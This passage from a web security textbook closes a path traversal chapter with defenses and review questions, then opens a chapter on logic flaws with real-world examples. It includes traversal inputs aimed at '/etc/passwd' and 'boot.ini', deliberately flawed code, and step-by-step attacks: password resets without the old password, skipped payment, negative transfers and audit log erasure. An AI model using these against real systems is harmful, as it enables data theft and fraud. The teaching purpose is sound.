tain a hard-coded list of image files that may be served by the page, and use a

different identifier to specify which file is required, such as an index number.

Any request containing an invalid identifier can be rejected, and there is no

attack surface for users to manipulate the path of files delivered by the page.
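A minimal Python sketch of the index-based approach follows. The table contents and the function name are hypothetical; the point is only that the user-supplied value is used as a lookup key and never reaches a file system API.

```python
from typing import Optional

# Hypothetical hard-coded list of files the page may serve.
ALLOWED_IMAGES = {
    1: "diagram1.jpg",
    2: "diagram2.jpg",
}


def filename_for(identifier: str) -> Optional[str]:
    """Map a user-supplied identifier to a filename, or None if invalid."""
    try:
        index = int(identifier)
    except ValueError:
        return None
    return ALLOWED_IMAGES.get(index)


print(filename_for("1"))
print(filename_for("../../etc/passwd"))
```

Any request for which the lookup returns None can simply be rejected.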

In some cases, as with the workflow functionality that allows file uploading

and downloading, it may be desirable to allow users to specify files by name,

and developers may decide that the easiest way to implement this is by pass-

ing the user-supplied filename to file system APIs. In this situation, the appli-

cation should take a defense-in-depth approach to place several obstacles in

the way of a path traversal attack.

Here are some examples of defenses that may be used; ideally, as many of

these as possible should be implemented together:

■ After performing all relevant decoding and canonicalization of the user-submitted filename, the application should check whether this contains either of the path traversal sequences (using backward or forward slashes) or any null bytes. If so, the application should stop processing the request. It should not attempt to perform any sanitization on the malicious filename.

■ The application should use a hard-coded list of permissible file types and reject any request for a different type (after the preceding decoding and canonicalization have been performed).

■ After performing all of its filtering on the user-supplied filename, the application should use suitable file system APIs to verify that nothing is amiss, and that the file to be accessed using that filename is located within the start directory specified by the application.

In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory followed by a path separator (so that a sibling directory whose name merely shares the same prefix does not pass the check), then the user has somehow bypassed the application’s input filters, and the request should be rejected.

In ASP.NET, this can be achieved by passing the user-supplied filename to the System.IO.Path.GetFullPath method and checking the returned string in the same way as described for Java.

■ The application can mitigate the impact of most exploitable path traversal vulnerabilities by using a chrooted environment to access the directory containing the files to be accessed. In this situation, the chrooted

directory is treated as if it is the file system root, and any redundant tra-

versal sequences that attempt to step up above it are ignored.

Chrooted file systems are supported natively on most Unix-based plat-

forms. A similar effect can be achieved on Windows platforms (in rela-

tion to traversal vulnerabilities, at least) by mounting the relevant start

directory as a new logical drive and using the associated drive letter to

access its contents.

■ The application should integrate its defenses against path traversal attacks with its logging and alerting mechanisms. Whenever a request is received that contains path traversal sequences, this indicates likely malicious intent on the part of the user, and the application should log the request as an attempted security breach, terminate the user’s session, and if applicable, suspend the user’s account and generate an alert to an administrator.
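The first three defenses can be combined as in the following Python sketch. It is an analogue of the Java and ASP.NET checks described above rather than a translation of them: os.path.realpath plays the role of the canonicalization call, and the function name and the list of permitted extensions are assumptions.

```python
import os
import tempfile

ALLOWED_EXTENSIONS = {".jpg", ".png"}  # hypothetical permitted file types


def resolve_within(start_dir, user_filename):
    """Return the canonical path for user_filename, or raise ValueError."""
    # Reject outright rather than sanitize.
    if "\x00" in user_filename:
        raise ValueError("null byte in filename")
    if ".." in user_filename.replace("\\", "/").split("/"):
        raise ValueError("traversal sequence in filename")
    if os.path.splitext(user_filename)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("file type not permitted")
    # Final check: the canonical path must lie inside the start directory.
    base = os.path.realpath(start_dir)
    candidate = os.path.realpath(os.path.join(base, user_filename))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the start directory")
    return candidate


start = tempfile.mkdtemp()
print(resolve_within(start, "diagram1.jpg"))
for bad in ("../diagram1.jpg", "/etc/passwd.jpg", "boot.ini\x00.jpg", "notes.txt"):
    try:
        resolve_within(start, bad)
    except ValueError as exc:
        print("rejected:", exc)
```

Comparing whole path components with os.path.commonpath avoids the pitfall of a plain string-prefix test, which would accept a sibling directory whose name begins with the start directory's name.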

Chapter Summary

Path traversal can often be a devastating vulnerability, enabling you to break

through many layers of security controls to gain direct access to sensitive data,

including passwords, configuration files, application logs, and source code. If

the vulnerability grants write access, it can quickly lead to a complete com-

promise of the application and underlying server.

Path traversal bugs are surprisingly common; however, they are often sub-

tle to detect and may be protected by various kinds of input validation which

deflect the most obvious attacks but can nevertheless be bypassed with skill

and determination. The most important lesson when probing for path traver-

sal flaws is to be patient and work systematically to try to understand pre-

cisely how your input is being handled, and how the server’s processing can

be manipulated to achieve success.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. You insert a standard path traversal detection string into the

following URL:

https://wahh-app.com/logrotate.pl?file=../../../../../etc/passwd

The application returns the following error message:

passwd.log not found in /etc directory!

What input should you submit next to try to retrieve the passwd file?

2. You are probing for path traversal flaws in a file download function.

The following URL returns the file called

foo.txt:

https://wahh-app.com/showFile.php?f=foo.txt

After some experimentation, you discover that supplying the input

../foo.txt returns the original file, whereas supplying the input

bar/../foo.txt returns an error.

What might be the cause of this unusual behavior, and how can you

attempt to refine your attack?

3. An application uses URLs like the following to view various configura-

tion files:

https://wahh-app.com/manage/customize.asp?file=default.xml

You have determined that the file specified is normally retrieved from

the

/contrib directory within the web root. However, requesting the

following URL:

https://wahh-app.com/manage/customize.asp?file=../../../../boot.ini

results in an HTTP 500 status code and the following error message:

Microsoft VBScript runtime (0x800A0046)

Permission denied

What is the likely cause of this message, and how can you proceed

towards exploitation?

4. You have located a file handling function that appears to be vulnerable

to path traversal attacks. However, you have no idea what the location

of the starting directory is, or how many traversal sequences you need

to insert to get to the file system root. How can you proceed without

this information?

5. You have located a path traversal vulnerability. However, the starting

directory is within a separate logical volume that is only used for

hosted web content. Is it possible to exploit this vulnerability to any

malicious effect?

CHAPTER 11

Attacking Application Logic

All web applications employ logic in order to deliver their functionality. Writ-

ing code in a programming language involves at its root nothing more than

breaking down a complex process into very simple and discrete logical steps.

Translating a piece of functionality that is meaningful to human beings into

a sequence of small operations that can be executed by a computer involves a

great deal of skill and discretion. Doing it in an elegant and secure fashion is

harder still. When large numbers of different designers and programmers work in parallel on the same application, there is ample opportunity for

mistakes to occur.

In all but the very simplest of web applications, a vast amount of logic is

performed at every stage. This logic presents an intricate attack surface that

is always present but often overlooked. Many code reviews and penetration

tests focus exclusively on the common “headline” vulnerabilities like SQL

injection and cross-site scripting, because these have an easily recognizable

signature and well-researched exploitation vector. By contrast, flaws in an

application’s logic are harder to characterize: each instance may appear to be a

unique one-off occurrence, and they are not usually identified by any auto-

mated vulnerability scanners. As a result, they are not generally as well appre-

ciated or understood, and they are therefore of great interest to an attacker.

In this chapter, we will describe the kinds of logic flaws that often exist in web

applications and the practical steps that you can take to probe and attack an

application’s logic. We will present a series of real-world examples, each of which

manifests a different kind of logical defect and which together serve to illustrate

the variety of assumptions made by designers and developers that can lead

directly to faulty logic, and expose an application to security vulnerabilities.

The Nature of Logic Flaws

Logic flaws in web applications are extremely varied. They range from simple

bugs manifested in a handful of lines of code, to extremely complex vulnera-

bilities arising from the interoperation of several core components of the appli-

cation. In some instances, they may be obvious and trivial to detect; in other

cases, they may be exceptionally subtle and liable to elude even the most rig-

orous code review or penetration test.

Unlike other coding flaws such as SQL injection or cross-site scripting,

there is no common “signature” associated with logic flaws. The defining

characteristic, of course, is that the logic implemented within the application

is defective in some way. In many cases, the defect can be represented in

terms of a specific assumption that has been made in the thinking of the

designer or developer, either explicitly or implicitly, and that turns out to be

flawed. In general terms, a programmer may have reasoned something like

“If A happens, then B must be the case, so I will do C.” The programmer did

not ask the entirely different question “But what if X occurs?” and so failed

to take account of a scenario that violates the assumption. Depending on the

circumstances, this flawed assumption may open up a significant security

vulnerability.

As awareness of common web application vulnerabilities has increased in

recent years, the incidence and severity of some categories of vulnerability

have declined noticeably. However, because of the nature of logic flaws, it is

unlikely that they will ever be completely eliminated via standards for secure

development, use of code-auditing tools, or normal penetration testing. The

diverse nature of logic flaws, and the fact that detecting and preventing them

often requires a good measure of lateral thinking, suggests that they will be

prevalent for a good while to come. Any serious attacker, therefore, needs to

pay serious attention to the logic employed in the application being targeted,

to try to figure out the assumptions that designers and developers are likely to

have made, and then to think imaginatively about how those assumptions

may be violated.

Real-World Logic Flaws

The best way to learn about logic flaws is not by theorizing, but through

acquaintance with some actual examples. Although individual instances of

logic flaws differ hugely, they share many common themes, and they demon-

strate the kinds of mistake that human developers will always be prone to

making. Hence, insights gathered from studying a sample of logic flaws

should help you to uncover new flaws in entirely different situations.

Example 1: Fooling a Password Change Function

The authors have encountered this logic flaw in a web application imple-

mented by a financial services company and also in the AOL AIM Enterprise

Gateway application.

The Functionality

The application implemented a password change function for end users. It

required the user to fill out fields for username, existing password, new pass-

word, and confirm new password.

There was also a password change function for use by administrators. This

allowed them to change the password of any user without the need to supply

the existing password. The two functions were implemented within the same

server-side script.

The Assumption

The client-side interface presented to users and administrators differed in one

respect — the administrator’s interface did not contain a field for an existing

password. When the server-side application processed a password change

request, it used the presence or absence of the existing password parameter to

indicate whether the request was from an administrator or an ordinary user. In

other words, it assumed that ordinary users would always supply an existing

password parameter.

The code responsible looked something like this:

String existingPassword = request.getParameter("existingPassword");
if (null == existingPassword)
{
    trace("Old password not supplied, must be an administrator");
    return true;
}
else
{
    trace("Verifying user's old password");
    ...

The Attack

Once the assumption has been explicitly stated in this way, the logic flaw

becomes obvious. Of course, an ordinary user can issue a request that does not

contain an existing password parameter, because users control every aspect of

the requests they issue.

This logic flaw was devastating for the application. It enabled an attacker to

reset the password of any other user and so take full control of their account.

HACK STEPS

■ When probing key functionality for logic flaws, try removing in turn each

parameter submitted in requests, including cookies, query string fields,

and items of POST data.

■ Be sure to delete the actual name of the parameter as well as its value.

Do not just submit an empty string, as this is typically handled differently

by the server.

■ Attack only one parameter at a time, to ensure that all relevant code

paths within the application are reached.

■ If the request you are manipulating is part of a multistage process, fol-

low the process through to completion, because some later logic may

process data that was supplied in earlier steps and stored within the

session.
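The first three steps can be automated along the following lines. This Python sketch only builds the request variants; sending them is left to whatever HTTP tooling you use. Apart from existingPassword, the parameter names and values are hypothetical.

```python
def single_removal_variants(params):
    """Return (removed_name, remaining_params) pairs, one per parameter.

    Each variant omits exactly one parameter, name and value together,
    rather than submitting it with an empty string.
    """
    variants = []
    for name in params:
        remaining = {k: v for k, v in params.items() if k != name}
        variants.append((name, remaining))
    return variants


request_params = {
    "username": "victim",             # hypothetical field names and values
    "existingPassword": "unknown",
    "newPassword": "Secret123",
    "confirmPassword": "Secret123",
}

for removed, remaining in single_removal_variants(request_params):
    print("without", removed, "->", sorted(remaining))
```

In the password change example, the variant that omits existingPassword is the one that triggers the administrator code path.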

Example 2: Proceeding to Checkout

The authors encountered this logic flaw in the web application employed by

an online retailer.

The Functionality

The process of placing an order involved the following stages:

1. Browse the product catalog and add items to the shopping basket.

2. Return to the shopping basket and finalize the order.

3. Enter payment information.

4. Enter delivery information.

The Assumption

The developers assumed that users would always access the stages in the intended sequence, because this was the order in which the stages were delivered to the user by the navigational links and forms presented to their browser.

Hence, any user who completed the order process must have submitted satis-

factory payment details along the way.

The Attack

The developers’ assumption was flawed for fairly obvious reasons. Users con-

trol every request that they make to the application and so can access any stage

of the ordering process in any sequence. By proceeding directly from stage 2 to

stage 4, an attacker could generate an order that was finalized for delivery but

that had not actually been paid for.

HACK STEPS

The technique for finding and exploiting flaws of this kind is known as forced

browsing. This involves circumventing any controls imposed by in-browser

navigation on the sequence in which application functions may be accessed:

■ When a multistage process involves a defined sequence of requests,

attempt to submit these requests out of the expected sequence. Try skip-

ping certain stages altogether, accessing a single stage more than once,

and accessing earlier stages after later ones.

■ The sequence of stages may be accessed via a series of GET or POST

requests for distinct URLs, or they may involve submitting different sets

of parameters to the same URL. The stage being requested may be speci-

fied by submitting a function name or index within a request parameter.

Be sure to understand fully the mechanisms that the application is

employing to deliver access to distinct stages.

■ From the context of the functionality that is implemented, try to under-

stand what assumptions may have been made by developers and where

the key attack surface lies. Try to identify ways of violating those

assumptions to cause undesirable behavior within the application.

■ When multistage functions are accessed out of sequence, it is common

to encounter a variety of anomalous conditions within the application,

such as variables with null or uninitialized values, a partially defined or

inconsistent state, and other unpredictable behavior. In this situation, the

application may return interesting error messages and debug output,

which can be used to better understand its internal workings and thereby

fine-tune the current or a different attack (see Chapter 14). Sometimes,

the application may get into a state entirely unanticipated by developers,

which may lead to serious security flaws.
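One way to enumerate out-of-sequence test cases is sketched below in Python. The stage labels are hypothetical names for the four ordering stages in this example, and the function covers only three simple variations: skipping one stage, repeating one stage, and reversing the order.

```python
def forced_browsing_sequences(stages):
    """Return request orderings that deviate from the intended sequence."""
    sequences = []
    for i in range(len(stages)):
        sequences.append(stages[:i] + stages[i + 1:])  # skip stage i
        sequences.append(stages[:i + 1] + stages[i:])  # visit stage i twice
    sequences.append(list(reversed(stages)))           # later stages first
    return sequences


STAGES = ["basket", "finalize", "payment", "delivery"]  # hypothetical labels

for sequence in forced_browsing_sequences(STAGES):
    print(" -> ".join(sequence))
```

The ordering that omits the payment stage corresponds to the attack described in this example.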

NOTE Many types of access control vulnerability are similar in nature

to this logic flaw. When a privileged function involves multiple stages that are

normally accessed in a defined sequence, the application may assume that

users will always proceed through the functionality in this sequence. The

application may enforce strict access control on the initial stages of the process

and assume that any user who reaches the later stages must, therefore, be

authorized. If a low-privileged user proceeds directly to a later stage, she may

be able to access it without any restrictions. See Chapter 8 for more details

on finding and exploiting vulnerabilities of this kind.

Example 3: Rolling Your Own Insurance

The authors encountered this logic flaw in a web application deployed by a

financial services company.

The Functionality

The application enabled users to obtain quotations for insurance, and if desired,

complete and submit an insurance application online. The process was spread

across a dozen stages, as follows:

■ At the first stage, the applicant submits some basic information, and

specifies either a preferred monthly premium or the value the applicant

wishes insurance for. The application offers a quotation, computing

whichever value the applicant did not specify.

■ Across several stages, the applicant supplies various other personal

details, including health, occupation, and pastimes.

■ Finally, the application is transmitted to an underwriter working for the

insurance company. Using the same web application, the underwriter

reviews the details and decides whether to accept the application as is,

or modify the initial quotation to reflect any additional risks.

Through each of the stages described, the application employed a shared

component to process each parameter of user data submitted to it. This

component parsed out all of the data in each POST request into name/value pairs,

and updated its state information with each item of data received.

The Assumption

The component which processed user-supplied data assumed that each

request would contain only the parameters that had been requested from the

user in the relevant HTML form. Developers did not consider what would

happen if a user submitted parameters that they had not been asked to supply.

The Attack

Of course, the assumption was flawed, because users can submit arbitrary

parameter names and values with every request. As a result, the core func-

tionality of the application was broken in various ways:

■ An attacker could exploit the shared component to bypass all server-side

input validation. At each stage of the quotation process, the application

performed strict validation of the data expected at that stage, and

rejected any data that failed this validation. But the shared component

updated the application’s state with every parameter supplied by the

user. Hence, if an attacker submitted data out of sequence, by supply-

ing a name/value pair which the application expected at an earlier

stage, then that data would be accepted and processed, with no valida-

tion having been performed. As it happened, this possibility paved the

way for a stored cross-site scripting attack targeting the underwriter,

which allowed a malicious user to access the personal information

belonging to other applicants (see Chapter 12).

■ An attacker could buy insurance at an arbitrary price. At the first stage

of the quotation process, the applicant specified either their preferred

monthly premium or the value they wished to insure, and the applica-

tion computed the other item accordingly. However, if a user supplied

new values for either or both of these items at a later stage, then the

application’s state was updated with these values. By submitting these

parameters out of sequence, an attacker could obtain a quotation for

insurance at an arbitrary value and arbitrary monthly premium.

■ There were no access controls regarding which parameters a given

type of user could supply. When an underwriter reviewed a completed

application, they updated various items of data, including the accep-

tance decision. This data was processed by the shared component in

the same way as for data supplied by an ordinary user. If an attacker

knew or guessed the parameter names used when the underwriter

reviewed an application, then the attacker could simply submit

these, thereby accepting their own application without any actual

underwriting.
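The behavior of the shared component can be illustrated with a small sketch. This is not the application's actual code: the class, field names, and validation rules below are assumptions chosen only to show how per-stage validation and a component that stores every submitted parameter can combine into the flaws just described.

```python
class QuoteSession:
    """Hypothetical per-applicant state held by the application."""
    def __init__(self):
        self.state = {}

# Fields that each stage's HTML form asks for (assumed names).
STAGE_FIELDS = {
    1: {"premium", "insured_value"},
    2: {"occupation", "pastimes"},
}

def validate(name, value):
    """Strict validation, applied only to fields expected at the current stage."""
    if name in {"premium", "insured_value"}:
        return value.isdigit()
    return "<" not in value

def handle_post(session, stage, params):
    # Validation covers only the fields expected at this stage...
    for name in STAGE_FIELDS[stage]:
        if name in params and not validate(name, params[name]):
            raise ValueError(f"invalid {name}")
    # ...but the shared component stores every name/value pair it receives.
    session.state.update(params)

session = QuoteSession()
handle_post(session, 1, {"insured_value": "100000"})
# Stage 2 request carrying a stage 1 field and an underwriter-only field.
handle_post(session, 2, {"occupation": "clerk", "premium": "1", "decision": "accept"})
```

In this sketch the second request changes the premium and sets an acceptance decision without either value being validated or authorized. One way to close the gap would be to store only the parameters that the current stage and the current user's role are expected to supply.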

HACK STEPS

The flaws in this application were absolutely fundamental to its security, but

none of them would have been identified by an attacker who simply

intercepted browser requests and modified the parameter values being

submitted.

■ Whenever an application implements a key action across multiple stages,

you should take parameters that are submitted at one stage of the

process, and try submitting these to a different stage. If the relevant

items of data are updated within the application’s state, you should

explore the ramifications of this behavior, to determine whether you can

leverage it to carry out any malicious action, as in the preceding three

examples.

■ If the application implements functionality whereby different categories

of user can update or perform other actions on a common collection of

data, you should walk through the process using each type of user and

observe the parameters submitted. Where different parameters are ordi-

narily submitted by the different users, take each parameter submitted

by one user and try to submit this as the other user. If the parameter is

accepted and processed as that user, explore the implications of this

behavior as previously described.

Example 4: Breaking the Bank

The authors encountered this logic flaw in the web application deployed by a

major financial services company.

The Functionality

The application enabled existing customers who did not already use the online

application to register to do so. New users were required to supply some basic

personal information, to provide a degree of assurance of their identity. This

information included name, address, and date of birth, but did not include

anything secret such as an existing password or PIN number.

When this information had been correctly entered, the application for-

warded the registration request to back-end systems for processing. An infor-

mation pack was mailed to the user’s registered home address. This pack

included instructions for activating their online access via a telephone call to

the company’s call center and also a one-time password to use when first log-

ging in to the application.

The Assumption

The application’s designers believed that this mechanism provided a very

robust defense against unauthorized access to the application. The mechanism

implemented three layers of protection:

■ A modest amount of personal data was required up front, to deter a

malicious attacker or mischievous user from attempting to initiate the

registration process on other users’ behalf.

■ The process involved transmitting a key secret out-of-band to the

customer’s registered home address. Any attacker would need to have

access to the victim’s personal mail.

■ The customer was required to telephone the call center and authenticate

himself there in the usual way, based on personal information and

selected digits from a PIN number.

This design was indeed robust. The logic flaw lay in the actual implementa-

tion of the mechanism.

The developers implementing the registration mechanism needed a way to

store the personal data submitted by the user and correlate this with a unique

customer identity within the company’s database. Keen to reuse existing code,

they came across the following class, which appeared to serve their purposes:

class CCustomer
{
    String firstName;
    String lastName;
    CDoB dob;
    CAddress homeAddress;
    long custNumber;
    ...

After the user’s information was captured, this object was instantiated, pop-

ulated with the supplied information, and stored in the user’s session. The

application then verified the user’s details, and if they were valid, retrieved

that user’s unique customer number, which was used in all of the company’s

systems. This number was added to the object, together with some other use-

ful information about the user. The object was then transmitted to the relevant

back-end system for the registration request to be processed.

The developers assumed that making use of this code component was

harmless and would not lead to any security problem. However, the assump-

tion was flawed, with serious consequences.

The Attack

The same code component that was incorporated into the registration func-

tionality was also used elsewhere within the application, including within the

core functionality, which gave authenticated users access to account details,

statements, funds transfers, and other information. When a registered user

successfully authenticated herself to the application, this same object was

instantiated and saved in her session to store key information about her iden-

tity. The majority of the functionality within the application referenced the

information within this object in order to carry out its actions — for example,

the account details presented to the user on her main page were generated on

the basis of the unique customer number contained within this object.

The way in which the code component was already being employed within the

application meant that the developers’ assumption was flawed, and the man-

ner in which they reused it did indeed open up a significant vulnerability.

Although the vulnerability was serious, it was in fact relatively subtle to

detect and exploit. Access to the main application functionality was protected

by access controls at several layers, and a user needed to have a fully authen-

ticated session to pass these controls. To exploit the logic flaw, therefore, an

attacker needed to perform the following steps:

■ Log in to the application using the attacker’s own valid account credentials.

■ Using the resulting authenticated session, access the registration

functionality and submit a different customer’s personal information. This

causes the application to overwrite the original CCustomer object in the

attacker’s session with a new object relating to the targeted customer.

■ Return to the main application functionality and access the other

customer’s account.

A vulnerability of this kind is not straightforward to detect when probing

the application from a black-box perspective. However, it is also hard to iden-

tify when reviewing or writing the actual source code. Without a clear under-

standing of the application as a whole and the use made of different

components in different areas, the flawed assumption made by developers

may not be evident. Of course, clearly commented source code and design

documentation would reduce the likelihood of such a defect being introduced

or remaining undetected.
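The interaction between the two code paths in this example can be sketched as follows. The sketch is a simplification under stated assumptions: the session is modeled as a plain dictionary, the customer names and numbers are invented, and credential and identity checks are omitted. It is not the bank's code.

```python
from dataclasses import dataclass

@dataclass
class Customer:
    name: str
    cust_number: int

# Hypothetical customer records keyed by name.
CUSTOMERS = {"alice": 1001, "bob": 2002}

def login(session, name):
    # Credential checks omitted; on success the identity object is stored.
    session["customer"] = Customer(name, CUSTOMERS[name])
    session["authenticated"] = True

def register(session, name):
    # Reuses the same session key as login() and never considers that
    # the session may already be authenticated.
    session["customer"] = Customer(name, CUSTOMERS[name])

def view_account(session):
    if not session.get("authenticated"):
        raise PermissionError("login required")
    # Account data is selected by whatever customer object the session holds.
    return session["customer"].cust_number

session = {}
login(session, "alice")       # the attacker's own account
register(session, "bob")      # overwrites the identity object
account_shown = view_account(session)
```

Here `account_shown` is the victim's customer number, even though only the attacker's credentials were ever presented. Keeping registration state under a separate session key, or refusing registration within an authenticated session, are two possible ways to avoid the collision.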

HACK STEPS

■ In a complex application involving either horizontal or vertical privilege

segregation, try to locate any instances where an individual user can

accumulate an amount of state within their session which relates in

some way to their identity.

■ Try to step through one area of functionality, and then switch altogether

to an unrelated area, to determine whether any accumulated state infor-

mation has an effect on the application’s behavior.

Example 5: Erasing an Audit Trail

The authors encountered this logic flaw in a web application used in a call center.

The Functionality

The application implemented various functions enabling helpdesk personnel

and administrators to support and manage a large user base. Many of these

functions were security-sensitive, including the creation of accounts and the

resetting of passwords. Hence, the application maintained a full audit trail,

recording every action performed and the identity of the user responsible.

The application included a function allowing administrators to delete audit

trail entries. However, to protect this function from being maliciously exploited,

any use of the function was itself recorded, so the audit trail would indicate the

identity of the user responsible.

The Assumption

The designers of the application believed that it would be impossible for a

malicious user to perform an undesirable action without leaving some evi-

dence in the audit trail that would link them to the action. An attempt by an

administrator to cleanse the audit logs altogether would always leave one last

entry that would point the finger of suspicion at them.

The Attack

The designers’ assumption was flawed, and it was possible for a malicious

administrative user to carry out arbitrary actions without leaving any

evidence within the audit trail that could identify them as responsible. The

steps required are:

1. Log in using your own account, and create a second user account.

2. Assign all of your privileges to the new account.

3. Use the new account to perform a malicious action of your choice.

4. Use the new account to delete all of the audit log entries generated by

the first three steps.

Each of these actions generates entries in the audit log. However, in the last

step, the attacker deletes all of the entries created by the preceding actions. The

audit log now contains a single suspicious entry, indicating that some log

entries were deleted by a specific user — that is, by the new user account that

was created by the attacker. However, because the previous log entries have

been deleted, there is nothing in the logs to link the attacker to anything sus-

picious. The perfect crime.
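The four steps can be replayed against a toy audit log to see what survives. The `AuditLog` class and account names below are hypothetical; the sketch assumes only what the text states, namely that every action is recorded and that deleting entries is itself recorded.

```python
class AuditLog:
    def __init__(self):
        self.entries = []  # list of (actor, action) tuples

    def record(self, actor, action):
        self.entries.append((actor, action))

    def delete_entries(self, actor, predicate):
        """Remove matching entries; the deletion itself is always logged."""
        self.entries = [e for e in self.entries if not predicate(e)]
        self.record(actor, "deleted audit entries")

log = AuditLog()
log.record("admin1", "created account admin2")         # step 1
log.record("admin1", "assigned privileges to admin2")  # step 2
log.record("admin2", "malicious action")               # step 3
log.delete_entries("admin2", lambda entry: True)       # step 4
```

The only remaining entry names the throwaway account, and nothing ties that account back to its creator. A log that cannot be deleted through the application, or that records deletions in a separate store, would not lose that link.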

NOTE This type of flaw can also be found in some security models that

require dual authorization for security-critical actions. If an attacker can create

a new account and use it to provide secondary authorization for a malicious

action that he performs, then the additional defense provided by the model can

be trivially circumvented.

It is also worth noting that even without the facility to delete audit trail

entries, the ability to create other powerful user accounts may make audit trails

difficult to follow, potentially requiring a large number of entries to be traced

through to identify a perpetrator.

Example 6: Beating a Business Limit

The authors encountered this logic flaw in a web-based enterprise resource

planning application used within a manufacturing company.

The Functionality

Finance personnel had the facility to perform funds transfers between various

bank accounts owned by the company and their key customers and suppliers.

As a precaution against fraud, the application prevented most users from pro-

cessing transfers with a value greater than $10,000. Any transfer larger than

this required a senior manager’s approval.

The Assumption

The code responsible for implementing this check within the application was

extremely simple:

bool CAuthCheck::RequiresApproval(int amount)
{
    if (amount <= m_apprThreshold)
        return false;
    else return true;
}

The developer assumed that this transparent check was bulletproof. No

transaction for greater than the configured threshold could ever escape the

requirement for secondary approval.

The Attack

The developer’s assumption was flawed because he had completely over-

looked the possibility that a user would attempt to process a transfer for a neg-

ative amount. Any negative number will clear the approval test, because it is

less than the threshold. However, the banking module of the application

accepted negative transfers and simply processed them as positive transfers in

the opposite direction. Hence, any user wishing to transfer $20,000 from

account A to account B could simply initiate a transfer of -$20,000 from account

B to account A, which had the same effect and required no approval. The anti-

fraud defenses built into the application could be trivially bypassed!
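The bypass is easy to reproduce in a few lines. The sketch below restates the approval check in Python and pairs it with an assumed model of the banking module, in which a negative amount simply moves money the other way. The account names, balances, and the `requires_approval_fixed` variant are illustrative additions, not part of the original application.

```python
APPROVAL_THRESHOLD = 10_000

def requires_approval(amount):
    # Mirrors the check in the text: only an upper bound is tested.
    return amount > APPROVAL_THRESHOLD

def transfer(balances, source, dest, amount):
    # Assumed banking-module behavior: a negative amount moves
    # money in the opposite direction.
    balances[source] -= amount
    balances[dest] += amount

def requires_approval_fixed(amount):
    # One possible repair: reject non-positive amounts before comparing.
    if amount <= 0:
        raise ValueError("amount must be positive")
    return amount > APPROVAL_THRESHOLD

balances = {"A": 50_000, "B": 0}
if not requires_approval(-20_000):
    transfer(balances, "B", "A", -20_000)  # moves 20,000 from A to B
```

After this runs, account A has lost 20,000 and account B has gained it, with no approval requested. Comparing the absolute value against the threshold would be another possible repair, provided negative transfers are a legitimate feature at all.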

NOTE Many kinds of web applications employ numeric limits within their

business logic. For example:

■ A retailing application may prevent a user from ordering more than the

number of units available in stock.

■ A banking application may prevent a user from making bill payments

that exceed her current account balance.

■ An insurance application may adjust its quotations based on age

thresholds.

Finding a means of beating such limits will often not represent a security

compromise of the application itself. However, it may have serious business

consequences and represent a breach of the controls that the owner is relying

on the application to enforce.

The most obvious vulnerabilities of this kind will often be detected during the

user-acceptance testing that normally occurs before an application is launched.

However, more subtle manifestations of the problem may remain, particularly

when hidden parameters are being manipulated.

HACK STEPS

The first step in attempting to beat a business limit is to understand what

characters are accepted within the relevant input which you control.

■ Try entering negative values and see if these are accepted by the applica-

tion and processed in the way that you would expect.

■ You may need to perform several steps in order to engineer a change in

the application’s state that can be exploited for a useful purpose. For

example, several transfers between accounts may be required until a

suitable balance has been accrued that can actually be extracted.

Example 7: Cheating on Bulk Discounts

The authors encountered this logic flaw in the retail application of a software

vendor.

The Functionality

The application allowed users to order software products and qualify for bulk

discounts if a suitable bundle of items was purchased. For example, users who

purchased an antivirus solution, personal firewall, and anti-spam software

were entitled to a 25% discount on their individual prices.

The Assumption

When a user added an item of software to his shopping basket, the application

used various rules to determine whether the bundle of purchases he had cho-

sen entitled him to any discount. If so, the prices of the relevant items within

the shopping basket were adjusted in line with the discount. The developers

assumed that the user would go on to purchase the chosen bundle and so be

entitled to the discount.

The Attack

The developers’ assumption is rather obviously flawed and ignores the fact

that users may remove items from their shopping baskets after they have been

added. A crafty user could add to his basket large quantities of every single

product on sale from the vendor, to attract the maximum possible bulk dis-

counts. When the discounts had been applied to items in the shopping basket,

he could remove items he did not require and still receive the discounts

applied to the remaining products.
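A minimal model of the basket shows where the state goes wrong. The product names, prices, and the `Basket` class are assumptions made for illustration. The only behavior taken from the text is that the discount is applied when the bundle is present and is not revisited when items are removed.

```python
BUNDLE = {"antivirus", "firewall", "antispam"}
LIST_PRICES = {"antivirus": 40.0, "firewall": 30.0, "antispam": 20.0}

class Basket:
    def __init__(self):
        self.prices = {}  # item -> price currently charged

    def add(self, item):
        self.prices[item] = LIST_PRICES[item]
        # The discount is applied once the bundle is complete.
        if BUNDLE.issubset(self.prices):
            for name in BUNDLE:
                self.prices[name] = LIST_PRICES[name] * 0.75

    def remove(self, item):
        # Flaw: the prices of the remaining items are not recalculated.
        del self.prices[item]

    def total(self):
        return sum(self.prices.values())

basket = Basket()
for item in ("antivirus", "firewall", "antispam"):
    basket.add(item)
basket.remove("firewall")
basket.remove("antispam")
```

The basket now holds a single antivirus product at the bundle price. Recomputing every price from the list prices whenever the basket changes, and again at checkout, would remove the discrepancy.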

HACK STEPS

■ In any situation where prices or other sensitive values are adjusted

based on criteria that are determined by user-controllable data or

actions, first understand the algorithms used by the application, and the

point within its logic where adjustments are made. Identify whether

these adjustments are made on a one-time basis or whether they are

revised in response to further actions performed by the user.

■ Think imaginatively, and try to find a way of manipulating the applica-

tion’s behavior to cause it to get into a state where the adjustments it

has applied do not correspond to the original criteria intended by its

designers. In the most obvious case, as just described, this may simply

involve removing items from a shopping cart after a discount has been

applied!

Example 8: Escaping from Escaping

The authors encountered this logic flaw in various web applications, including

the web administration interface used by a network intrusion detection product.

The Functionality

The application’s designers had decided to implement some functionality that

involved passing user-controllable input as an argument to an operating sys-

tem command. The application’s developers understood the inherent risks

involved in this kind of operation (see Chapter 9) and decided to defend

against these risks by sanitizing any potentially malicious characters within

the user input. Any instance of the following would be escaped using the back-

slash character:

; | & < > ` space and newline

Escaping data in this way causes the shell command interpreter to treat the

relevant characters as part of the argument being passed to the invoked com-

mand, rather than as shell metacharacters that could be used to inject addi-

tional commands or arguments, redirect output, and so on.

The Assumption

The developers were certain that they had devised a robust defense against

command injection attacks. They had brainstormed every possible character

that might assist an attacker, and had ensured that they were all properly

escaped and therefore made safe.

The Attack

The developers forgot to escape the escape character itself.

The backslash character is not normally of direct use to an attacker when

exploiting a simple command injection flaw, and so the developers did not

identify it as potentially malicious. However, by failing to escape it, they pro-

